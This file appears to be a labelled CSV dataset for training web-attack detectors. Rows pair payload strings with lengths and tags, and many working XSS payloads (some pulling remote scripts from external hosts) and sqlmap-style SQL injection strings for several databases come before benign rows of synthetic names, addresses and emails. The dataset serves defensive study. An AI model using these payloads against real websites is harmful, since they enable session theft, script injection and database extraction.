"';alert(string.fromcharcode(88,83,83))//';alert(string.fromcharcode(88,83,83))//"";alert(string.fromcharcode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//"";alert(string.fromcharcode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></script>"">'><script>alert(string.fromcharcode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</script>","457","xss","anom"
"<script>alert(""crosssitescripting2"")</script>","45","xss","anom"
"<script>alert(document.cookie)</script>","39","xss","anom"
"<script>alert('vl')</script>","28","xss","anom"
"<!--#exec cmd=""/bin/echo '<scr'""--><!--#exec cmd=""/bin/echo 'ipt src=http://vulnerability-lab.com/crosssitescripting.js></script>'""-->","134","xss","anom"
"<img src=javascript:alert(""crosssitescripting"")>"";' >","53","xss","anom"
"<script>alert(""crosssitescripting"")</script>"";' >","49","xss","anom"
"<embed src=""http://vulnerability-lab.com/crosssitescripting.swf"" allowscriptaccess=""always""></embed>","100","xss","anom"
"<embed src=""data:image/svg+xml;base64,phn2zyb4bwxuczpzdmc9imh0dh a6ly93d3cudzmub3jnlziwmdavc3zniib4bwxucz0iahr0cdovl3d3dy53my5vcmcv mjawmc9zdmciihhtbg5zonhsaw5rpsjodhrwoi8vd3d3lnczlm9yzy8xotk5l3hs aw5riib2zxjzaw9upsixljaiihg9ijaiihk9ijaiihdpzhropsixotqiighlawdodd0imjaw iibpzd0iehnzij48c2nyaxb0ihr5cgu9inrlehqvzwntyxnjcmlwdci+ywxlcnqoilh tuyipozwvc2nyaxb0pjwvc3znpg=="" type=""image/svg+xml"" allowscriptaccess=""always""></embed>","425","xss","anom"
"<script src=http://vulnerability-lab.com/crosssitescripting.js></script>","72","xss","anom"
"<<script>alert(""crosssitescripting"");//<</script>","49","xss","anom"
"<script src=//vulnerability-lab.com/.js>","40","xss","anom"
"<script>a=/crosssitescripting/ alert(a.source)</script>","55","xss","anom"
"<script a=`>` src=""http://vulnerability-lab.com/crosssitescripting.js""></script>","80","xss","anom"
"<script>document.write(""<scri"");</script>pt src=""http://vulnerability-lab.com/crosssitescripting.js""></script>","110","xss","anom"
"<img src=""javascript:alert('crosssitescripting');"">","51","xss","anom"
"<img src=javascript:alert('crosssitescripting')>","48","xss","anom"
"<img src=`javascript:alert(""rm'crosssitescripting'"")`>","54","xss","anom"
"<img """"""><script>alert(""crosssitescripting"")</script>"">","55","xss","anom"
"<img src=""jav ascript:alert('crosssitescripting');"">","52","xss","anom"
"<img src="" javascript:alert('crosssitescripting');"">","52","xss","anom"
"<img dynsrc=""javascript:alert('crosssitescripting')"">","53","xss","anom"
"<img lowsrc=""javascript:alert('crosssitescripting')"">","53","xss","anom"
"<img src=""mocha:[code]"">","24","xss","anom"
"<img src=""livescript:[code]"">","29","xss","anom"
"<meta http-equiv=""refresh"" content=""0;url=data:text/html;base64,phnjcmlwdd5hbgvydcgnwfntjyk8l3njcmlwdd4k"">","106","xss","anom"
"<meta http-equiv=""refresh"" content=""0; url=http://;url=javascript:alert('crosssitescripting');"">","96","xss","anom"
"<meta http-equiv=""set-cookie"" content=""userid=<script>alert('crosssitescripting')</script>"">","92","xss","anom"
"<head><meta http-equiv=""content-type"" content=""text/html; charset=utf-7""> </head>+adw-script+ad4-alert('crosssitescripting');+adw-/script+ad4-","142","xss","anom"
"<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('crosssitescripting')></object>","129","xss","anom"
"<style>@im\\port'\\ja asc ipt:alert(""crosssitescripting"")';</style>","65","xss","anom"
"<style type=""text/javascript"">alert('crosssitescripting');</style>","66","xss","anom"
"<style>.crosssitescripting{background-image:url(""javascript:alert('crosssitescripting')"");}</style><a class=crosssitescripting></a>","131","xss","anom"
"<style>li {list-style-image: url(""javascript:alert('crosssitescripting')"");}</style><ul><li>crosssitescripting","110","xss","anom"
"<style>body{-moz-binding:url(""http://vulnerability-lab.com/crosssitescriptingmoz.xml#crosssitescripting"")}</style>","114","xss","anom"
"<div style=""background-image:52c8'a161332904a1c5248.10278.1053379'9"">","69","xss","anom"
"<div style=""width: expression(alert('crosssitescripting'));"">","61","xss","anom"
"<link rel=""stylesheet"" href=""javascript:alert('crosssitescripting');"">","70","xss","anom"
"<link rel=""stylesheet"" href=""http://vulnerability-lab.com/crosssitescripting.css"">","82","xss","anom"
"<body onload=alert('crosssitescripting')>","41","xss","anom"
"<img low id=xss src=""javascript:alert('xss')"">","46","xss","anom"
"<link rel=""stylesheet"" href=""javascript:alert('xss');"">","55","xss","anom"
"<img id=xss src='vbscript:msgbox(""xss"")'>","41","xss","anom"
"<table id=xss background=""javascript:alert('xss')"">","51","xss","anom"
"<table id=xss><td background=""javascript:alert('xss')"">","55","xss","anom"
"<div id=xss style=""width: expression(alert('xss'));"">","53","xss","anom"
"<iframe id=xss src=""javascript:alert('xss');""></iframe>","55","xss","anom"
"<table background=""javascript:alert('xss')"">","44","xss","anom"
"<table><td background=""javascript:alert('xss')"">""","49","xss","anom"
"<img id=xss style=""xss:expr/*xss*/ession(alert('xss'))"">","56","xss","anom"
"<style type=""text/javascript"">alert('xss');</style>","51","xss","anom"
"<style type=""text/css"">body{background:url(""javascript:alert('xss')"")}</style>","78","xss","anom"
"<base href=""javascript:alert('xss');//"">","40","xss","anom"
"a=""get"";b=""url("""";c=""javascript:"";d=""alert('xss');"")"";eval(a+b+c+d);","68","xss","anom"
"<xml id=xss><x><c><![cdata[<img id=xss src=""javas]]><![cdata[cript:alert('xss');"">]]></c></x><xml><span dataid=xss src=#i datafld=cdataformatas=html></span>","156","xss","anom"
"<xml id=xss src=""xsstest.xml"" id=i></xml><span dataid=xss src=#i datafld=c dataformatas=html></span>","100","xss","anom"
"<html><body><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributename=""innerhtml"" to=""xss<script defer>alert(""xss"")</script>""></body></html>","221","xss","anom"
"<meta http-equiv=""set-cookie"" content=""userid=<script>alert('xss')</script>"">","77","xss","anom"
"<script id=xss src=http://127.0.0.1></script>","45","xss","anom"
"<img id=xss src=javascript:alert(string.fromcharcode(88,83,83))>","64","xss","anom"
"<img id=xss src=""&14;javascript:alert('xss');"">","47","xss","anom"
"<iframe id=xss src=""javascript:alert('xss'); <","46","xss","anom"
"<script>a=/xss/nalert('xss');</script>","38","xss","anom"
"<div style=""background-image: url(javascript:alert('xss'));"">","61","xss","anom"
"<head><meta http-equiv=""content-type"" content=""text/html; charset=utf-7""></head>+adw-script+ad4-alert('xss');+adw-/script+ad4-","126","xss","anom"
"<div onmouseover=""alert('xss');"">,","34","xss","anom"
"<input type=""image"" dynid=xss src=""javascript:alert('xss');"">","61","xss","anom"
"<img id=xss src=&{alert('xss');};>","34","xss","anom"
"<a id=xss href=""about:<script>alert('xss');</script>"">","54","xss","anom"
"<object classid=clsid:..."" codebase=""javascript:alert('xss');"">","63","xss","anom"
"<style><!--</style><script>alert('xss');//--></script>","54","xss","anom"
"<!-- -- --><script>alert('xss');</script><!-- -- -->","52","xss","anom"
"<img id=xss src=""blah""onmouseover=""alert('xss');"">","50","xss","anom"
"<xml id=""x""><a><b><script>alert('xss');</script>;<b></a></xml>","62","xss","anom"
"<div datafld=""b"" dataformatas=""html"" dataid=xss src=""#xss""></div>","65","xss","anom"
"<xml id=i><x><c><![cdata[<img id=xss src=""javas]]<![cdata[cript:alert('xss');"">]]</c><x></xml>","94","xss","anom"
"<form id=""test"" /><button form=""test"" formaction=""javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32))"">x","139","xss","anom"
"<select id=xss onfocus=javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>","120","xss","anom"
"<textarea id=xss onfocus=javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>","122","xss","anom"
"<input id=xss onblur=javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>","135","xss","anom"
"<video id=xss poster=javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32))//","109","xss","anom"
"<video><source onerror=""javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32))"">","112","xss","anom"
"<video onerror=""javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32))""><source>","112","xss","anom"
"<iframe id=xss / ""onload=alert(/xss/)></iframe>","47","xss","anom"
"<iframe id=xss///////onload=alert(/xss/)></iframe>","50","xss","anom"
"<iframe id=xss <?php echo chr(11)?> onload=alert(/xss/)></iframe>","65","xss","anom"
"<iframe id=xss <?php echo chr(12)?> onload=alert(/xss/)></iframe>","65","xss","anom"
""" onblur=alert(xss) ""> <""","25","xss","anom"
""" onmouseover=alert(xss) "">","27","xss","anom"
"<style>li {list-style-image: url(""javascript:alert('xss')"");}</style><ul><li>xss","80","xss","anom"
"</textarea>'""><script>alert(xss)</script>","41","xss","anom"
"</script></script><<<<script><>>>><<<script>alert(xss)</script>","63","xss","anom"
"<html><noalert><noscript>(xss)</noscript><script>(xss)</script>","63","xss","anom"
"}</style><script>a=eval;b=alert;a(b(/xss/.source));</script>","60","xss","anom"
"<script>document.write(""xss"");</script>","39","xss","anom"
"='><script>alert(""xss"")</script>","32","xss","anom"
"<body background=javascript:'""><script>alert(xss)</script>></body>","66","xss","anom"
"<script>alert('xss');</script>","30","xss","anom"
"<script id=xss src=http://ha.ckers.org/xss.js></script>","55","xss","anom"
"id=xss src= <img 6;avascript:alert('xss')>","42","xss","anom"
"<script/xss id=xss src=""http://ha.ckers.org/xss.js""></script>","61","xss","anom"
"<img id=xss src=""javascript:alert('xss')""","41","xss","anom"
"<script>a=/xss/","15","xss","anom"
"<img lowid=xss src=""javascript:alert('xss')"">","45","xss","anom"
"<br size=""&{alert('xss')}"">","27","xss","anom"
"<link rel=""stylesheet"" href=""http://ha.ckers.org/xss.css"">","58","xss","anom"
"<style>@import'http://ha.ckers.org/xss.css';</style>","52","xss","anom"
"<style>body{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}</style>","75","xss","anom"
"<img id=xss src=""mocha:[code]"">","31","xss","anom"
"<meta http-equiv=""link"" content=""<javascript:alert('xss')>; rel=stylesheet"">","76","xss","anom"
"<meta http-equiv=""refresh"" content=""0; url=http://;url=javascript:alert('xss');"">","81","xss","anom"
"<div style=""width: expression(alert('xss'));"">","46","xss","anom"
"<img style=""xss:expr/*xss*/ession(alert('xss'))"">","49","xss","anom"
"exp/*<xss style='no\\xss:noxss(""*//*"");","38","xss","anom"
"<object type=""text/x-scriptlet"" data=""http://ha.ckers.org/scriptlet.html""></object>","83","xss","anom"
"a=""get"";","8","xss","anom"
"<!--<value><![cdata[<xml id=i><x><c><![cdata[<img id=xss src=""javas<![cdata[cript:alert('xss');"">","97","xss","anom"
"<script id=xss src=""http://ha.ckers.org/xss.jpg""></script>","58","xss","anom"
"<!--#exec cmd=""/bin/echo '<script src'""--><!--#exec cmd=""/bin/echo '=http://ha.ckers.org/xss.js></script>'""-->","110","xss","anom"
"<head><meta http-equiv=""content-type"" content=""text/html; charset=utf-7""> </head>+adw-script+ad4-alert('xss');+adw-/script+ad4-","127","xss","anom"
"<script a="">"" id=xss src=""http://ha.ckers.org/xss.js""></script>","63","xss","anom"
"<script ""a='>'"" id=xss src=""http://ha.ckers.org/xss.js""></script>","65","xss","anom"
"<script a=`>` id=xss src=""http://ha.ckers.org/xss.js""></script>","63","xss","anom"
"1' rlike (select (case when (7689=7689) then 1 else 0x28 end))","62","sqli","anom"
"1%')) or updatexml(1808,concat(0x2e,0x7171706a71,(select (elt(1808=1808,1))),0x717a767a71),8666) and (('%'='","108","sqli","anom"
"1 where 7072=7072 or row(1045,7562)>(select count(*),concat(0x7171706a71,(select (elt(1045=1045,1))),0x717a767a71,floor(rand(0)*2))x from (select 8488 union select 5584 union select 3051 union select 1210)a group by x)--","220","sqli","anom"
"-5360' where 8178=8178 union all select 8178,8178,8178--","56","sqli","anom"
"1') or exp(~(select * from (select concat(0x7171706a71,(select (elt(6270=6270,1))),0x717a767a71,0x78))x)) and ('thce'='thce","123","sqli","anom"
"1"" and 3202=like('abcdefg',upper(hex(randomblob(500000000/2))))","63","sqli","anom"
"1"";select like('abcdefg',upper(hex(randomblob(500000000/2))))","61","sqli","anom"
"1'||(select 'vxfx' where 7038=7038 and 9306=4187)||'","52","sqli","anom"
"1);select dbms_pipe.receive_message(chr(66)||chr(67)||chr(79)||chr(101),5) from dual","84","sqli","anom"
"1""))) and 3202=like('abcdefg',upper(hex(randomblob(500000000/2)))) and (((""oohx"" like ""oohx","91","sqli","anom"
"1'||(select 'brde' where 7390=7390 and 4386=utl_inaddr.get_host_address(chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (4386=4386) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113)))||'","237","sqli","anom"
"-6294"" union all select 9921,9921,9921,9921,9921,9921--","55","sqli","anom"
"-1630' union all select 1971,1971--","35","sqli","anom"
"1) or 4915=(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)--","97","sqli","anom"
"-9072) as saot where 2278=2278 order by 1#","42","sqli","anom"
"-3699%'))) union all select 8241,8241,8241,8241,8241,8241,8241,8241,8241#","73","sqli","anom"
"1')));waitfor delay '0:0:5'--","29","sqli","anom"
"1' where 2162=2162 procedure analyse(extractvalue(9627,concat(0x5c,(benchmark(5000000,md5(0x4b774c75))))),1)#","109","sqli","anom"
"1') and elt(1210=1210,sleep(5)) and ('gtov' like 'gtov","54","sqli","anom"
"-1808%"")) or 4595=3545 and ((""%""=""","34","sqli","anom"
"1')) as pdrg where 5960=5960 and 9198=9198--","44","sqli","anom"
"1"")) and 5556=(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) and ((""kpwc"" like ""kpwc","125","sqli","anom"
"-9297) union all select 6841,6841,6841,6841,6841--","50","sqli","anom"
"1"" and 8407=(select count(*) from generate_series(1,5000000)) and ""zwov""=""zwov","78","sqli","anom"
"1') procedure analyse(extractvalue(5840,concat(0x5c,0x7171706a71,(select (case when (5840=5840) then 1 else 0 end)),0x717a767a71)),1) and ('lkun' like 'lkun","156","sqli","anom"
"-8824%')) or make_set(9354=9354,7185) and (('%'='","49","sqli","anom"
"1'+(select mkbv where 1648=1648 and 9254=(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4)--","139","sqli","anom"
"1%""))) or 2633=dbms_pipe.receive_message(chr(112)||chr(65)||chr(65)||chr(103),5) and (((""%""=""","93","sqli","anom"
"1'))) and 2006=2006","19","sqli","anom"
"1"") where 2657=2657 and 5309=7592--","35","sqli","anom"
"1"") where 6138=6138 and 8594=(select 8594 from pg_sleep(5))--","61","sqli","anom"
"1"") as esks where 1138=1138;create or replace function sleep(int) returns int as '/lib/libc.so.6','sleep' language 'c' strict; select sleep(5)--","144","sqli","anom"
"-1621' in boolean mode) order by 1--","36","sqli","anom"
"1')) and 8514=(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) and (('miba'='miba","117","sqli","anom"
"1'+(select 'feof' where 1966=1966;create or replace function sleep(int) returns int as '/lib/libc.so.6','sleep' language 'c' strict; select sleep(5))+'","151","sqli","anom"
"1)) as myxo where 1759=1759 union all select null#","50","sqli","anom"
"1 where 1636=1636 and 6240=('qqpjq'||(select case 6240 when 6240 then 1 else 0 end from rdb$database)||'qzvzq')--","113","sqli","anom"
"1') or 8315=(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)","103","sqli","anom"
"-6095"") as hygc where 8142=8142 or 2724 in ((char(113)+char(113)+char(112)+char(106)+char(113)+(select (case when (2724=2724) then char(49) else char(48) end))+char(113)+char(122)+char(118)+char(122)+char(113)))--","213","sqli","anom"
"1') or exp(~(select * from (select concat(0x7171706a71,(select (elt(6270=6270,1))),0x717a767a71,0x78))x)) and ('nopu'='nopu","123","sqli","anom"
"1'))) and 4386=utl_inaddr.get_host_address(chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (4386=4386) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113)) and ((('nfix'='nfix","224","sqli","anom"
"1' or char(119)||char(100)||char(99)||char(121)=regexp_substring(repeat(right(char(1441),0),5000000000),null)--","111","sqli","anom"
"1)) union all select null,null,null,null,null,null,null,null,null#","66","sqli","anom"
"1') and 8407=(select count(*) from generate_series(1,5000000)) and ('qfwc'='qfwc","80","sqli","anom"
"1%""))) or extractvalue(1297,concat(0x5c,0x7171706a71,(select (elt(1297=1297,1))),0x717a767a71)) and (((""%""=""","108","sqli","anom"
"1' or sleep(5) and 'rpqn' like 'rpqn","36","sqli","anom"
"1)) and elt(1210=1210,sleep(5)) and ((5874=5874","47","sqli","anom"
"1')) or 8315=(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) and (('agsi'='agsi","123","sqli","anom"
"1')) as owcw where 1107=1107 and 8312=dbms_pipe.receive_message(chr(69)||chr(79)||chr(101)||chr(68),5)--","104","sqli","anom"
"1')));call regexp_substring(repeat(right(char(2385),0),500000000),null)--","73","sqli","anom"
"-3096' or 3821=5539 and 'zrth'='zrth","36","sqli","anom"
"1) where 2020=2020 and 2388=benchmark(5000000,md5(0x6d457153))#","63","sqli","anom"
"1"") as jiyl where 4893=4893 union all select null,null,null,null,null#","70","sqli","anom"
"1',exp(~(select * from (select concat(0x7171706a71,(select (elt(7759=7759,1))),0x717a767a71,0x78))x))","101","sqli","anom"
"-5691' union all select 6610,6610#","34","sqli","anom"
"1) where 5234=5234 or 8514=benchmark(5000000,md5(0x544d5a4c))#","62","sqli","anom"
"1'||(select 'vwls' where 5252=5252 rlike sleep(5)#","50","sqli","anom"
"1')) and 4386=utl_inaddr.get_host_address(chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (4386=4386) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113)) and (('foop' like 'foop","227","sqli","anom"
"1'||(select 'dezl' where 8661=8661;select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4)||'","133","sqli","anom"
"1') and 3202=like('abcdefg',upper(hex(randomblob(500000000/2)))) and ('xikz' like 'xikz","87","sqli","anom"
"1')) as cyom where 2318=2318 and 7533=7533--","44","sqli","anom"
"-5580 or 4829=1968","18","sqli","anom"
"1""))) or 1022=(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--","103","sqli","anom"
"1')));select (case when (6969=5797) then 6969 else 6969*(select 6969 from information_schema.character_sets) end)#","114","sqli","anom"
"1%""))) and 3715 in ((char(113)+char(113)+char(112)+char(106)+char(113)+(select (case when (3715=3715) then char(49) else char(48) end))+char(113)+char(122)+char(118)+char(122)+char(113))) and (((""%""=""","200","sqli","anom"
"1' in boolean mode) union all select null,null,null,null--","58","sqli","anom"
"-8945)) as fszo where 2320=2320 union all select 2320--","55","sqli","anom"
"1%') and 6055=ctxsys.drithsx.sn(6055,(chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (6055=6055) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113))) and ('%'='","211","sqli","anom"
"1%' or 7552=(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4) and '%'='","118","sqli","anom"
"prompt(1);>","11","xss","anom"
"-1302"")) as rshr where 2800=2800 or 4747=dbms_utility.sqlid_to_sqlhash((chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (4747=4747) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113)))--","236","sqli","anom"
"1' or 8384=like('abcdefg',upper(hex(randomblob(500000000/2)))) and 'aytf' like 'aytf","84","sqli","anom"
"1' where 4272=4272 union all select null,null,null,null#","56","sqli","anom"
"-6854"" where 7794=7794 union all select 7794,7794--","51","sqli","anom"
"1'+(select bfeq where 3445=3445 and 9198=9198--","47","sqli","anom"
"1')) or 8156=(select count(*) from generate_series(1,5000000))--","64","sqli","anom"
"1' and elt(3247=3969,3969) and 'xcbm' like 'xcbm","48","sqli","anom"
"1%') and char(107)||char(121)||char(97)||char(80)=regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null)--","145","sqli","anom"
"1%'))) and 8407=(select count(*) from generate_series(1,5000000)) and ((('%'='","78","sqli","anom"
"(select (case when (9263=9263) then 1 else 9263*(select 9263 from mysql.db) end))","81","sqli","anom"
"-9015%"") union all select 6948,6948--","37","sqli","anom"
"1'+(select sshu where 3442=3442 and (select 2*(if((select * from (select concat(0x7171706a71,(select (elt(3484=3484,1))),0x717a767a71,0x78))s), 8446744073709551610, 8446744073709551610))))+'","190","sqli","anom"
"1') where 1470=1470 and char(111)||char(77)||char(121)||char(88)=regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null)--","160","sqli","anom"
"-5449' or 4493=utl_inaddr.get_host_address(chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (4493=4493) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113)) and 'ryvy' like 'ryvy","226","sqli","anom"
"1%"")) and elt(4249=4249,7259) and ((""%""=""","41","sqli","anom"
"-7773' or 5903=('qqpjq'||(select case 5903 when 5903 then 1 else 0 end from rdb$database)||'qzvzq')","99","sqli","anom"
"1"" order by 1--","15","sqli","anom"
"1' procedure analyse(extractvalue(5840,concat(0x5c,0x7171706a71,(select (case when (5840=5840) then 1 else 0 end)),0x717a767a71)),1) and 'swke'='swke","149","sqli","anom"
"-7511)) as xqzf where 9939=9939 union all select 9939,9939,9939,9939,9939,9939,9939--","85","sqli","anom"
"<body onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(""crosssitescripting"")>","66","xss","anom"
"<table background=""javascript:alert('crosssitescripting')"">","59","xss","anom"
"<table><td background=""javascript:alert('crosssitescripting')"">","63","xss","anom"
"<br size=""&{alert('crosssitescripting')}"">","42","xss","anom"
"<a href=""http://server.com/"">crosssitescripting</a>","51","xss","anom"
"goldsmith1@esmarbella.ht","24","norm","norm"
"28867747x","9","norm","norm"
"calahorra, la","13","norm","norm"
"2239348379899052","16","norm","norm"
"8omba51a","8","norm","norm"
"1056","4","norm","norm"
"postrar","7","norm","norm"
"rayen","5","norm","norm"
"lovas@djbroadcast.bn","20","norm","norm"
"nuestra seora de la paz, 80 8f","30","norm","norm"
"37748","5","norm","norm"
"snedeker","8","norm","norm"
"brana@housemovie.id","19","norm","norm"
"80937614q","9","norm","norm"
"sant vicen de castellet","23","norm","norm"
"46179","5","norm","norm"
"morgan","6","norm","norm"
"foto3rfico","10","norm","norm"
"siu-kwok","8","norm","norm"
"gregescos","9","norm","norm"
"gonzaga ripalda","15","norm","norm"
"shue-sampson@artroscopiagc.mn","29","norm","norm"
"nuestra seora de las angustias s/n,","35","norm","norm"
"frigiliana","10","norm","norm"
"ciochon","7","norm","norm"
"sonoramente","11","norm","norm"
"ann-margaret@indorec.pro","24","norm","norm"
"26707809w","9","norm","norm"
"aldea del fresno","16","norm","norm"
"16522","5","norm","norm"
"pospalatal","10","norm","norm"
"766","3","norm","norm"
"seni+l","6","norm","norm"
"basilisa","8","norm","norm"
"bjerg@hangartalleres.er","23","norm","norm"
"78581094f","9","norm","norm"
"pineda trasmonte","16","norm","norm"
"29127","5","norm","norm"
"pintarrajar","11","norm","norm"
"gontrn","6","norm","norm"
"c/ costa i llobera 83","21","norm","norm"
"3820743619643877","16","norm","norm"
"99r5na","6","norm","norm"
"964","3","norm","norm"
"ajorca","6","norm","norm"
"pridiliano","10","norm","norm"
"16727733v","9","norm","norm"
"paraje antonio de nebrija 39,","29","norm","norm"
"margheri","8","norm","norm"
"6m2rtam267t3","12","norm","norm"
"baziga-turtuno@ofertasrusas.dz","30","norm","norm"
"c/ hermenegilda portillo, 70","28","norm","norm"
"31174","5","norm","norm"
"8859240955120408","16","norm","norm"
"macilento","9","norm","norm"
"5432","4","norm","norm"
"s3borrea","8","norm","norm"
"altaira","7","norm","norm"
"plaza movimiento ciudadano, 176","31","norm","norm"
"bollullos de la mitacin","23","norm","norm"
"zalzale1","8","norm","norm"
"vieta","5","norm","norm"
"jandette tarrida","16","norm","norm"
"castiglioni@hiperbilbao.nl","26","norm","norm"
"torms, els","10","norm","norm"
"40542","5","norm","norm"
"scotty","6","norm","norm"
"1165","4","norm","norm"
"v9n939z6","8","norm","norm"
"subirs figaredo","15","norm","norm"
"93698052p","9","norm","norm"
"gredos, 114 12?g","16","norm","norm"
"7277765230207053","16","norm","norm"
"hlinka","6","norm","norm"
"cristaldo marchan","17","norm","norm"
"dubarry@soyrojo.tr","18","norm","norm"
"bloc sant simo 93","17","norm","norm"
"miravete de la sierra","21","norm","norm"
"pakulski","8","norm","norm"
"5ecom058a?8a","12","norm","norm"
"brittni","7","norm","norm"
"tr11quil67321e","14","norm","norm"
"dennett","7","norm","norm"
"miles_detmers@sotelink.vu","25","norm","norm"
"uribitarte 72 13?g","18","norm","norm"
"pravia","6","norm","norm"
"mo19bun0a","9","norm","norm"
"buchel-alymer@gemas.org.bu","26","norm","norm"
"doctor ramon sanchez-parra, 17 11?d","35","norm","norm"
"miera","5","norm","norm"
"janna","5","norm","norm"
"eusquero","8","norm","norm"
"goddette","8","norm","norm"
"ci2586ta","8","norm","norm"
"forcades chocano","16","norm","norm"
"drohocka@baybay.mq","18","norm","norm"
"hornillos s/n,","14","norm","norm"
"valle de mena","13","norm","norm"
"anand","5","norm","norm"
"potroso","7","norm","norm"
"estaol bellet","13","norm","norm"
"verdier@zaya.name","17","norm","norm"
"c/ san pablo 130, 8h","20","norm","norm"
"50140","5","norm","norm"
"beaule","6","norm","norm"
"envelar","7","norm","norm"
"medioni5","8","norm","norm"
"esdrs","5","norm","norm"
"celeste_bryon@skullride.ki","26","norm","norm"
"98970543w","9","norm","norm"